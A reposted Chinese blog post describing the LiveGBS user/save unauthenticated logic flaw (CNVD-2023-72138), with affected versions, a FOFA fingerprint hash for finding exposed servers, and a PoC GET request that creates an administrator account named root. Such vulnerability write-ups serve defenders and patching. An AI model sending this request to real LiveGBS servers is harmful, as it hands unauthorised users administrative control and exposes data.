博客
关于我
LiveGBS user/save 逻辑缺陷漏洞复现(CNVD-2023-72138)
阅读量:795 次
发布时间:2023-02-06

本文共 585 字,大约阅读时间需要 1 分钟。

LiveGBS是一款由安徽青柿信息科技有限公司开发的国标(GB28181)流媒体服务软件,主要功能包括用户管理、Web可视化页面管理以及开源的前端页面源码提供,同时还支持设备状态管理,可实时监控设备是否正常运行。

在技术细节方面,该软件的user/save接口存在严重的逻辑漏洞。攻击者无需进行身份验证即可利用此漏洞,通过传递特定参数(如ID、Username、Role等),可以执行用户信息的任意添加操作。这种漏洞一旦被利用,会导致后台服务被接管,造成信息泄露等安全风险。

该漏洞主要影响LiveGBS版本号≤3.2.x的产品,已知攻击可能对系统造成严重后果。为了帮助开发团队快速定位问题,我们提供了以下复现环境信息:

FOFA hash: -206100324

至于漏洞的具体复现方法,我们提供了以下PoC示例:

GET /api/v1/user/save?ID=&Username=root&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML,

通过上述方法,可以有效复现漏洞现象。建议开发者及时修复该漏洞,以确保系统安全性。

转载地址:http://tuufk.baihongyu.com/

你可能感兴趣的文章
MySQL 大数据量快速插入方法和语句优化
查看>>
mysql 如何给SQL添加索引
查看>>
mysql 字段区分大小写
查看>>
mysql 字段合并问题(group_concat)
查看>>
mysql 字段类型类型
查看>>
MySQL 存储引擎
查看>>
mysql 存储过程 注入_mysql 视图 事务 存储过程 SQL注入
查看>>
MySQL 存储过程参数:in、out、inout
查看>>
mysql 存在update不存在insert
查看>>
Mysql 学习总结(86)—— Mysql 的 JSON 数据类型正确使用姿势
查看>>
Mysql 学习总结(89)—— Mysql 库表容量统计
查看>>
mysql 审核_审核MySQL数据库上的登录
查看>>
mysql 导入 sql 文件时 ERROR 1046 (3D000) no database selected 错误的解决
查看>>
mysql 常用命令
查看>>
Mysql 报错 Field 'id' doesn't have a default value
查看>>
MySQL 报错:Duplicate entry 'xxx' for key 'UNIQ_XXXX'
查看>>
mysql 数据库备份及ibdata1的瘦身
查看>>
MySQL 数据库备份种类以及常用备份工具汇总
查看>>
mysql 数据库存储引擎怎么选择?快来看看性能测试吧
查看>>
MySQL 数据库操作指南:学习如何使用 Python 进行增删改查操作
查看>>